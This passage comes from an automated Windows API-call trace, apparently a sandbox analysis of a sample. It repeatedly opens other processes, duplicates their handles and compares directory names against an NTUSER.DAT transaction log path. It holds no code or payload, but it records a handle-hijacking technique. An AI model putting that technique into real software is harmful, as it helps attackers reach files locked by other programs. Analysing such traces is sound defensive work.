lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.254] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.255] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.255] CloseHandle (hObject=0x670) returned 1 [0153.255] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.255] CloseHandle (hObject=0x680) returned 1 [0153.255] CloseHandle (hObject=0x62c) returned 1 [0153.255] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0153.255] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.255] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.256] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.256] CloseHandle (hObject=0x670) returned 1 [0153.256] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.256] CloseHandle (hObject=0x680) returned 1 [0153.256] CloseHandle (hObject=0x62c) returned 1 [0153.256] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0153.256] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.257] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.258] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.258] CloseHandle (hObject=0x670) returned 1 [0153.258] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.258] CloseHandle (hObject=0x680) returned 1 [0153.258] CloseHandle (hObject=0x62c) returned 1 [0153.258] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0153.258] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.259] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.259] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.259] CloseHandle (hObject=0x670) returned 1 [0153.259] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.259] CloseHandle (hObject=0x680) returned 1 [0153.259] CloseHandle (hObject=0x62c) returned 1 [0153.259] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0153.260] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.260] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.261] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.261] CloseHandle (hObject=0x670) returned 1 [0153.261] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.261] CloseHandle (hObject=0x680) returned 1 [0153.261] CloseHandle (hObject=0x62c) returned 1 [0153.261] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0153.261] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.262] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.262] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.262] CloseHandle (hObject=0x670) returned 1 [0153.263] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.263] CloseHandle (hObject=0x680) returned 1 [0153.263] CloseHandle (hObject=0x62c) returned 1 [0153.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0153.263] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.264] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.264] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.264] CloseHandle (hObject=0x670) returned 1 [0153.264] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.264] CloseHandle (hObject=0x680) returned 1 [0153.264] CloseHandle (hObject=0x62c) returned 1 [0153.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0153.265] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.265] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.266] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.266] CloseHandle (hObject=0x670) returned 1 [0153.266] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.266] CloseHandle (hObject=0x680) returned 1 [0153.266] CloseHandle (hObject=0x62c) returned 1 [0153.266] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0153.266] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.266] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.267] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.267] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.268] CloseHandle (hObject=0x670) returned 1 [0153.268] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.268] CloseHandle (hObject=0x680) returned 1 [0153.268] CloseHandle (hObject=0x62c) returned 1 [0153.268] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0153.268] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.268] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.269] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.270] CloseHandle (hObject=0x670) returned 1 [0153.270] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.270] CloseHandle (hObject=0x680) returned 1 [0153.270] CloseHandle (hObject=0x62c) returned 1 [0153.270] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0153.270] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.271] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.271] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.271] CloseHandle (hObject=0x670) returned 1 [0153.271] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0153.272] CloseHandle (hObject=0x680) returned 1 [0153.272] CloseHandle (hObject=0x62c) returned 1 [0153.272] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0153.272] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.272] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.272] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.273] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.273] CloseHandle (hObject=0x670) returned 1 [0153.273] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.273] CloseHandle (hObject=0x680) returned 1 [0153.273] CloseHandle (hObject=0x62c) returned 1 [0153.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0153.273] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.274] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.275] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.275] CloseHandle (hObject=0x670) returned 1 [0153.275] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.275] CloseHandle (hObject=0x680) returned 1 [0153.275] CloseHandle (hObject=0x62c) returned 1 [0153.275] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0153.275] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.276] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.276] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.276] CloseHandle (hObject=0x670) returned 1 [0153.277] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.277] CloseHandle (hObject=0x680) returned 1 [0153.277] CloseHandle (hObject=0x62c) returned 1 [0153.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0153.277] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.277] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.278] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.278] CloseHandle (hObject=0x670) returned 1 [0153.278] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0153.278] CloseHandle (hObject=0x680) returned 1 [0153.278] CloseHandle (hObject=0x62c) returned 1 [0153.278] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0153.278] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.279] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.279] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.280] CloseHandle (hObject=0x670) returned 1 [0153.280] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.280] CloseHandle (hObject=0x680) returned 1 [0153.280] CloseHandle (hObject=0x62c) returned 1 [0153.280] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0153.280] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.281] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.281] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.281] CloseHandle (hObject=0x670) returned 1 [0153.281] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.281] CloseHandle (hObject=0x680) returned 1 [0153.282] CloseHandle (hObject=0x62c) returned 1 [0153.282] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0153.282] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.282] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.284] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.284] CloseHandle (hObject=0x670) returned 1 [0153.284] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.284] CloseHandle (hObject=0x680) returned 1 [0153.284] CloseHandle (hObject=0x62c) returned 1 [0153.284] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0153.284] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.285] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.285] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.285] CloseHandle (hObject=0x670) returned 1 [0153.285] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.285] CloseHandle (hObject=0x680) returned 1 [0153.285] CloseHandle (hObject=0x62c) returned 1 [0153.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0153.286] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.286] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.287] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.287] CloseHandle (hObject=0x670) returned 1 [0153.287] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.287] CloseHandle (hObject=0x680) returned 1 [0153.287] CloseHandle (hObject=0x62c) returned 1 [0153.287] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0153.287] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.287] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.288] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.288] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.288] CloseHandle (hObject=0x670) returned 1 [0153.289] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0153.289] CloseHandle (hObject=0x680) returned 1 [0153.289] CloseHandle (hObject=0x62c) returned 1 [0153.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0153.289] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.289] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.290] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.290] CloseHandle (hObject=0x670) returned 1 [0153.290] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.290] CloseHandle (hObject=0x680) returned 1 [0153.290] CloseHandle (hObject=0x62c) returned 1 [0153.290] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0153.290] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.291] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.291] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.292] CloseHandle (hObject=0x670) returned 1 [0153.292] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0153.292] CloseHandle (hObject=0x680) returned 1 [0153.292] CloseHandle (hObject=0x62c) returned 1 [0153.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0153.292] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.293] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.293] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.293] CloseHandle (hObject=0x670) returned 1 [0153.293] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.293] CloseHandle (hObject=0x680) returned 1 [0153.293] CloseHandle (hObject=0x62c) returned 1 [0153.293] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0153.294] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.295] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.295] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.295] CloseHandle (hObject=0x670) returned 1 [0153.296] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.296] CloseHandle (hObject=0x680) returned 1 [0153.296] CloseHandle (hObject=0x62c) returned 1 [0153.296] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0153.296] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.296] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.297] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.297] CloseHandle (hObject=0x670) returned 1 [0153.297] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.297] CloseHandle (hObject=0x680) returned 1 [0153.297] CloseHandle (hObject=0x62c) returned 1 [0153.297] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 